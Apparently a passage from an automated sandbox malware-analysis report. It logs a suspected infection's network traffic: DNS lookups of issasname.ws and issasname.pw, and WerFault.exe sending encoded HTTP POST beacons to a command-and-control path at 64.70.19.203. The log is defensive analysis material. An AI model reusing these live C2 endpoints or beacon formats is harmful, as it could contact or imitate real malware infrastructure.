                      Dec 5, 2022 12:47:41.113176107 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:41.113193989 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:41.284473896 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:41.284538031 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:41.284811974 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:41.324163914 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:42.314713001 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:42.315095901 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:42.493643045 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:42.493673086 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:42.493768930 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:42.527684927 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:43.551273108 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:43.551273108 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:43.731388092 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:43.731421947 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:43.731714964 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:43.770843029 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:45.733760118 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:45.733886003 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:46.909368038 CET4970080192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:46.909842014 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:47.080256939 CET804970064.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:47.081667900 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:47.081829071 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:47.406786919 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:47.407196045 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:47.578250885 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:47.578309059 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:47.578428984 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:47.617655993 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:48.927165985 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:48.996059895 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:49.098418951 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:49.098450899 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:49.098560095 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:49.207195044 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:50.129126072 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:50.129240036 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:50.300298929 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:50.300355911 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:50.300452948 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:50.339808941 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:52.300324917 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:52.300932884 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.379641056 CET4970180192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.380157948 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.551043987 CET804970164.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:53.551075935 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:53.551163912 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.551372051 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.551389933 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.722326994 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:53.722367048 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:53.722429037 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:53.762636900 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:54.752098083 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:54.752161026 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:54.923017025 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:54.923067093 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:54.923168898 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:54.962780952 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:55.956294060 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:55.956346035 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:56.127218962 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:56.127250910 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:56.127398968 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:56.166471958 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:58.127944946 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:58.128380060 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.308618069 CET4970280192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.309379101 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.479604006 CET804970264.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:59.480115891 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:59.480407953 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.480753899 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.480783939 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:47:59.651473045 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:59.651508093 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:59.688416004 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:47:59.689490080 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:00.735136032 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:00.735136032 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:00.906112909 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:00.906209946 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:00.945637941 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:01.952442884 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:01.953716993 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:02.123275995 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:02.123313904 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:02.123529911 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:02.164690971 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:04.125025988 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:04.125128031 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.286149025 CET4970380192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.286566973 CET4970480192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.457190990 CET804970364.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:05.457443953 CET804970464.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:05.457595110 CET4970480192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.503144026 CET4970480192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.503209114 CET4970480192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.674568892 CET804970464.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:05.674633980 CET804970464.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:05.674829960 CET4970480192.168.2.564.70.19.203
                      Dec 5, 2022 12:48:05.713804960 CET804970464.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:07.674763918 CET804970464.70.19.203192.168.2.5
                      Dec 5, 2022 12:48:07.675301075 CET4970480192.168.2.564.70.19.203
                      TimestampSource PortDest PortSource IPDest IP
                      Dec 5, 2022 12:46:19.368386984 CET5821853192.168.2.58.8.8.8
                      Dec 5, 2022 12:46:19.388096094 CET53582188.8.8.8192.168.2.5
                      Dec 5, 2022 12:46:21.586869955 CET6099853192.168.2.58.8.8.8
                      Dec 5, 2022 12:46:21.606560946 CET53609988.8.8.8192.168.2.5
                      Dec 5, 2022 12:46:47.927086115 CET5695353192.168.2.58.8.8.8
                      Dec 5, 2022 12:46:47.948565960 CET53569538.8.8.8192.168.2.5
                      Dec 5, 2022 12:46:51.682096004 CET5864853192.168.2.58.8.8.8
                      Dec 5, 2022 12:46:51.860229015 CET53586488.8.8.8192.168.2.5
                      Dec 5, 2022 12:46:58.081708908 CET5689453192.168.2.58.8.8.8
                      Dec 5, 2022 12:46:58.104207993 CET53568948.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:00.505069017 CET5029553192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:00.527439117 CET53502958.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:01.537971973 CET6084153192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:01.558377981 CET53608418.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:02.932140112 CET6189353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:02.949665070 CET53618938.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:04.160000086 CET6064953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:04.205295086 CET53606498.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:08.104903936 CET5144153192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:08.131750107 CET53514418.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:09.177295923 CET4917753192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:09.196525097 CET53491778.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:11.113308907 CET4972453192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:11.133984089 CET53497248.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:12.422530890 CET6145253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:12.440295935 CET53614528.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:14.828602076 CET6532353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:14.849047899 CET53653238.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:15.867122889 CET5148453192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:15.893258095 CET53514848.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:17.255496979 CET6344653192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:17.275229931 CET53634468.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:18.479582071 CET5675153192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:18.500483036 CET53567518.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:20.714375019 CET5503953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:20.733977079 CET53550398.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:21.740885973 CET6097553192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:21.760761976 CET53609758.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:23.130640030 CET5922053192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:23.149879932 CET53592208.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:24.351722002 CET5506853192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:24.369570017 CET53550688.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:26.631484032 CET5668253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:26.653245926 CET53566828.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:27.665007114 CET5853253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:27.682667971 CET53585328.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:29.244020939 CET6265953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:29.261298895 CET53626598.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:30.882400036 CET5858153192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:30.911650896 CET53585818.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:33.137125015 CET5626353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:33.163158894 CET53562638.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:34.200351000 CET6551353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:34.245270014 CET53655138.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:36.008358955 CET5668753192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:36.027875900 CET53566878.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:37.664024115 CET6441953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:37.681339025 CET53644198.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:39.883457899 CET5268853192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:39.902812004 CET53526888.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:40.915661097 CET6134453192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:40.935453892 CET53613448.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:42.290935993 CET5397253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:42.309464931 CET53539728.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:43.523839951 CET6493253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:43.544738054 CET53649328.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:45.766359091 CET5847253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:45.783976078 CET53584728.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:46.882335901 CET6017753192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:46.901873112 CET53601778.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:48.646536112 CET6028453192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:48.676736116 CET53602848.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:50.104298115 CET6001953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:50.123997927 CET53600198.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:52.321288109 CET5090253192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:52.340924025 CET53509028.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:53.355410099 CET5382353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:53.374838114 CET53538238.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:54.727550030 CET4976953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:54.747028112 CET53497698.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:55.932002068 CET4957953192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:55.951236963 CET53495798.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:58.149919987 CET5355553192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:58.166851997 CET53535558.8.8.8192.168.2.5
                      Dec 5, 2022 12:47:59.283850908 CET6129353192.168.2.58.8.8.8
                      Dec 5, 2022 12:47:59.301642895 CET53612938.8.8.8192.168.2.5
                      Dec 5, 2022 12:48:00.708043098 CET5008653192.168.2.58.8.8.8
                      Dec 5, 2022 12:48:00.725605965 CET53500868.8.8.8192.168.2.5
                      Dec 5, 2022 12:48:01.921839952 CET5218853192.168.2.58.8.8.8
                      Dec 5, 2022 12:48:01.941637039 CET53521888.8.8.8192.168.2.5
                      Dec 5, 2022 12:48:04.170104027 CET5458553192.168.2.58.8.8.8
                      Dec 5, 2022 12:48:04.191605091 CET53545858.8.8.8192.168.2.5
                      Dec 5, 2022 12:48:05.225991964 CET5210053192.168.2.58.8.8.8
                      Dec 5, 2022 12:48:05.243825912 CET53521008.8.8.8192.168.2.5
                      Dec 5, 2022 12:48:07.129353046 CET6090853192.168.2.58.8.8.8
                      Dec 5, 2022 12:48:07.149082899 CET53609088.8.8.8192.168.2.5
DNS queries (columns: Timestamp, Source IP, Dest IP, Trans ID, OP Code, Name, Type, Class, DNS over HTTPS). Every query below has Source IP 192.168.2.5, Dest IP 8.8.8.8, OP Code "Standard query (0)", Type "A (IP address)", Class "IN (0x0001)" and DNS over HTTPS "false"; only the timestamp, transaction ID and queried name vary.

Timestamp | Trans ID | Name
Dec 5, 2022 12:46:19.368386984 CET | 0xf518 | issasname.pw
Dec 5, 2022 12:46:21.586869955 CET | 0xf49f | issasname.ws
Dec 5, 2022 12:46:47.927086115 CET | 0x1254 | issasname.ws
Dec 5, 2022 12:46:51.682096004 CET | 0xa46b | issasname.ws
Dec 5, 2022 12:46:58.081708908 CET | 0x38fd | issasname.ws
Dec 5, 2022 12:47:00.505069017 CET | 0x79d8 | issasname.pw
Dec 5, 2022 12:47:01.537971973 CET | 0xc01b | issasname.ws
Dec 5, 2022 12:47:02.932140112 CET | 0xd7eb | issasname.ws
Dec 5, 2022 12:47:04.160000086 CET | 0xfe12 | issasname.ws
Dec 5, 2022 12:47:08.104903936 CET | 0xefe6 | issasname.pw
Dec 5, 2022 12:47:09.177295923 CET | 0x826a | issasname.ws
Dec 5, 2022 12:47:11.113308907 CET | 0xdc14 | issasname.ws
Dec 5, 2022 12:47:12.422530890 CET | 0x806e | issasname.ws
Dec 5, 2022 12:47:14.828602076 CET | 0x32c | issasname.pw
Dec 5, 2022 12:47:15.867122889 CET | 0xe9b2 | issasname.ws
Dec 5, 2022 12:47:17.255496979 CET | 0xcc3d | issasname.ws
Dec 5, 2022 12:47:18.479582071 CET | 0x451a | issasname.ws
Dec 5, 2022 12:47:20.714375019 CET | 0xe994 | issasname.pw
Dec 5, 2022 12:47:21.740885973 CET | 0xcd36 | issasname.ws
Dec 5, 2022 12:47:23.130640030 CET | 0x878f | issasname.ws
Dec 5, 2022 12:47:24.351722002 CET | 0x57bf | issasname.ws
Dec 5, 2022 12:47:26.631484032 CET | 0x9839 | issasname.pw
Dec 5, 2022 12:47:27.665007114 CET | 0x93e8 | issasname.ws
Dec 5, 2022 12:47:29.244020939 CET | 0xd183 | issasname.ws
Dec 5, 2022 12:47:30.882400036 CET | 0xebe7 | issasname.ws
Dec 5, 2022 12:47:33.137125015 CET | 0x1bb1 | issasname.pw
Dec 5, 2022 12:47:34.200351000 CET | 0x45f2 | issasname.ws
Dec 5, 2022 12:47:36.008358955 CET | 0xb077 | issasname.ws
Dec 5, 2022 12:47:37.664024115 CET | 0x4c0 | issasname.ws
Dec 5, 2022 12:47:39.883457899 CET | 0x4cb1 | issasname.pw
Dec 5, 2022 12:47:40.915661097 CET | 0x4dde | issasname.ws
Dec 5, 2022 12:47:42.290935993 CET | 0x105b | issasname.ws
Dec 5, 2022 12:47:43.523839951 CET | 0x3e7e | issasname.ws
Dec 5, 2022 12:47:45.766359091 CET | 0x212e | issasname.pw
Dec 5, 2022 12:47:46.882335901 CET | 0x76cf | issasname.ws
Dec 5, 2022 12:47:48.646536112 CET | 0xcce4 | issasname.ws
Dec 5, 2022 12:47:50.104298115 CET | 0xa72f | issasname.ws
Dec 5, 2022 12:47:52.321288109 CET | 0xf99a | issasname.pw
Dec 5, 2022 12:47:53.355410099 CET | 0x4136 | issasname.ws
Dec 5, 2022 12:47:54.727550030 CET | 0xd969 | issasname.ws
Dec 5, 2022 12:47:55.932002068 CET | 0xef0f | issasname.ws
Dec 5, 2022 12:47:58.149919987 CET | 0xa864 | issasname.pw
Dec 5, 2022 12:47:59.283850908 CET | 0x4f31 | issasname.ws
Dec 5, 2022 12:48:00.708043098 CET | 0xbe02 | issasname.ws
Dec 5, 2022 12:48:01.921839952 CET | 0xde41 | issasname.ws
Dec 5, 2022 12:48:04.170104027 CET | 0x62ae | issasname.pw
Dec 5, 2022 12:48:05.225991964 CET | 0xf207 | issasname.ws
Dec 5, 2022 12:48:07.129353046 CET | 0xbba3 | issasname.ws
DNS answers (columns: Timestamp, Source IP, Dest IP, Trans ID, Reply Code, Name, CName, Address, Type, Class, DNS over HTTPS). Every answer below has Source IP 8.8.8.8, Dest IP 192.168.2.5, Reply Code "No error (0)", Name issasname.ws, an empty CName, Address 64.70.19.203, Type "A (IP address)", Class "IN (0x0001)" and DNS over HTTPS "false"; only the timestamp and transaction ID vary. Only issasname.ws answers are listed; no answer for issasname.pw appears in the report.

Timestamp | Trans ID | Name | Address
Dec 5, 2022 12:46:21.606560946 CET | 0xf49f | issasname.ws | 64.70.19.203
Dec 5, 2022 12:46:47.948565960 CET | 0x1254 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:46:51.860229015 CET | 0xa46b | issasname.ws | 64.70.19.203
Dec 5, 2022 12:46:58.104207993 CET | 0x38fd | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:01.558377981 CET | 0xc01b | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:02.949665070 CET | 0xd7eb | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:04.205295086 CET | 0xfe12 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:09.196525097 CET | 0x826a | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:11.133984089 CET | 0xdc14 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:12.440295935 CET | 0x806e | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:15.893258095 CET | 0xe9b2 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:17.275229931 CET | 0xcc3d | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:18.500483036 CET | 0x451a | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:21.760761976 CET | 0xcd36 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:23.149879932 CET | 0x878f | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:24.369570017 CET | 0x57bf | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:27.682667971 CET | 0x93e8 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:29.261298895 CET | 0xd183 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:30.911650896 CET | 0xebe7 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:34.245270014 CET | 0x45f2 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:36.027875900 CET | 0xb077 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:37.681339025 CET | 0x4c0 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:40.935453892 CET | 0x4dde | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:42.309464931 CET | 0x105b | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:43.544738054 CET | 0x3e7e | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:46.901873112 CET | 0x76cf | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:48.676736116 CET | 0xcce4 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:50.123997927 CET | 0xa72f | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:53.374838114 CET | 0x4136 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:54.747028112 CET | 0xd969 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:55.951236963 CET | 0xef0f | issasname.ws | 64.70.19.203
Dec 5, 2022 12:47:59.301642895 CET | 0x4f31 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:48:00.725605965 CET | 0xbe02 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:48:01.941637039 CET | 0xde41 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:48:05.243825912 CET | 0xf207 | issasname.ws | 64.70.19.203
Dec 5, 2022 12:48:07.149082899 CET | 0xbba3 | issasname.ws | 64.70.19.203
                      • issasname.ws
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      0 | 192.168.2.5 | 49690 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:46:49.744932890 CET | 94 | OUT | POST /xyz/abc/order.php?id=9504479 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1062
                      Cache-Control: no-cache
                      Dec 5, 2022 12:46:49.745218039 CET | 95 | OUT | Data Ascii: mewogyqi=61769446&oicw=1cf030c42d6710494760523837d4b33145ebab89da817222f6dd5f95e305&qmieaw=0BA9B4B7380861F71B81684334F4A10335B3EEEF8683DE04CD76CCFAF458B46452D61F32DCE6F23E5B4FC9293FC4691CC5BDB36D5AE6E997855EEEAAF4FF7BA7B7851768289D2D30B7C5C88A
                      Dec 5, 2022 12:46:49.917643070 CET | 96 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:46:49 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      1 | 192.168.2.5 | 49692 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:46:55.095514059 CET | 107 | OUT | POST /xyz/abc/order.php?page=70 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1018
                      Cache-Control: no-cache
                      Dec 5, 2022 12:46:55.095606089 CET | 108 | OUT | Data Ascii: aagg=18614418&cemowy=828af4665b66c4683f1c2f812e693af145cb&eiswgkoy=725EBB19395786DDC249E09DFF6F66A182EAA9334A6A475371E89AF5FD6427E3A228C47A48428264CD45D0197C7193A1964CFB01EDAB5617F64F9ED420506441F6BC3A33EC2D758F489F3B11453CA6B2CFDF7AA495CD4EE1
                      Dec 5, 2022 12:46:55.266063929 CET | 109 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:46:55 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      10 | 192.168.2.5 | 49701 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:47:47.406786919 CET | 161 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1018
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:47.407196045 CET | 162 | OUT | Data Ascii: iqemai=67382af2e15f23f6a63b1f1e09f967aa634f&gmye=93200814&kukukuku=5182E9E16ED7606899377DBC258D753B100972548393DDB400551E92A9B73378DA8901A2AA00F975B580A937ADD31089C70102F5243E10596D8D1559E16C69F10F2156BA3D8BB183A63F7E46D9F7DBA6B7FA91787A443973
                      Dec 5, 2022 12:47:47.578309059 CET | 162 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:47 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:48.927165985 CET | 163 | OUT | POST /xyz/abc/order.php?id=1465544 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1042
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:48.996059895 CET | 164 | OUT | Data Ascii: lwhsdoz=35ec158ddb99e48d16799014231aea2e599f0360849adb5121bc&jsbkt=55428139&nanananan=61b1f7397cb691b787efefe7ca4f35c48d0a83de11d1223756ab68b29818b44ef39a792d0dc5a90d22131501f2773ce6adeb90b89037dc56720770783af5bebddcdd46284bba733138ce90d29573c
                      Dec 5, 2022 12:47:49.098450899 CET | 164 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:49 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:50.129126072 CET | 165 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
